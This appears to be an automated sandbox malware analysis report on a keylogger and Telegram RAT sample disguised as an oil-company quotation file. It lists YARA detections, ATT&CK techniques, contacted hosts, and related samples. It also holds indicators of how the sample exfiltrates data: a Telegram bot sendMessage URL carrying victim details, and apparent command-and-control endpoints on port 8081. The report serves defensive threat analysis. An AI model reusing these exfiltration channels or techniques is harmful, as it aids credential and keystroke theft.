Source: Yara match	File source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	111 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
_Company.exe	47%	ReversingLabs	Win32.Trojan.Generic
_Company.exe	100%	Avira	HEUR/AGEN.1309847
_Company.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
smtp.hostinger.com	172.65.255.143	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	_Company.exe, 00000002.00000002.4647934767.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000032D9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://smtp.hostinger.com	_Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000332B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://www.office.com/lB	_Company.exe, 00000002.00000002.4647934767.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	_Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	_Company.exe, 00000002.00000002.4647934767.00000000032B7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	_Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	_Company.exe, 00000002.00000002.4647934767.00000000032B2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	_Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	_Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	_Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	_Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.65.255.143	smtp.hostinger.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577705
Start date and time:	2024-12-18 17:06:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	_Company.exe renamed because original name is a hash value
Original Sample Name:	QTN_Detailed_Schedule_for_Balance_Activities_in_Terminal_5_Area_By_Abu_Dhabi_National_Oil_Company.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 112 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.199.58.43, 104.126.37.163, 13.107.246.63, 23.218.208.109, 150.171.28.10, 104.126.37.160, 4.175.87.197
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: _Company.exe

Simulations

Behavior and APIs

Time	Type	Description
11:07:18	API Interceptor	10368677x Sleep call for process: _Company.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	chrome11.exe	Get hash	malicious	Unknown	Browse
	chrome11.exe	Get hash	malicious	Unknown	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FileScanner.exe	Get hash	malicious	Unknown	Browse
104.21.67.152	0001.exe	Get hash	malicious	Snake Keylogger	Browse
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
158.101.44.242	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FT876567090.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
reallyfreegeoip.org	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
api.telegram.org	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	chrome11.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	https://shorturl.at/roHta	Get hash	malicious	HTMLPhisher	Browse	104.26.8.129
	https://www.grapevine.org/join/next-gen-giving-circle-dc	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFr	Get hash	malicious	HTMLPhisher	Browse	172.67.187.179
	http://bluepeak-group.com/fc	Get hash	malicious	Unknown	Browse	172.67.68.137
	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.26.13.31
	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.26.12.31
	https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445	Get hash	malicious	KnowBe4	Browse	104.17.247.203
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	104.21.12.88
	0Vwp4nJQOc.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.179.109
CLOUDFLARENETUS	https://shorturl.at/roHta	Get hash	malicious	HTMLPhisher	Browse	104.26.8.129
	https://www.grapevine.org/join/next-gen-giving-circle-dc	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFr	Get hash	malicious	HTMLPhisher	Browse	172.67.187.179
	http://bluepeak-group.com/fc	Get hash	malicious	Unknown	Browse	172.67.68.137
	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.26.13.31
	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	104.26.12.31
	https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445	Get hash	malicious	KnowBe4	Browse	104.17.247.203
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	104.21.12.88
	0Vwp4nJQOc.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.179.109
ORACLE-BMC-31898US	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	192.29.189.21
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	jew.sh4.elf	Get hash	malicious	Unknown	Browse	147.154.227.181
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	https://machino.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	152.67.3.57
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	0001.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	Invoice.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
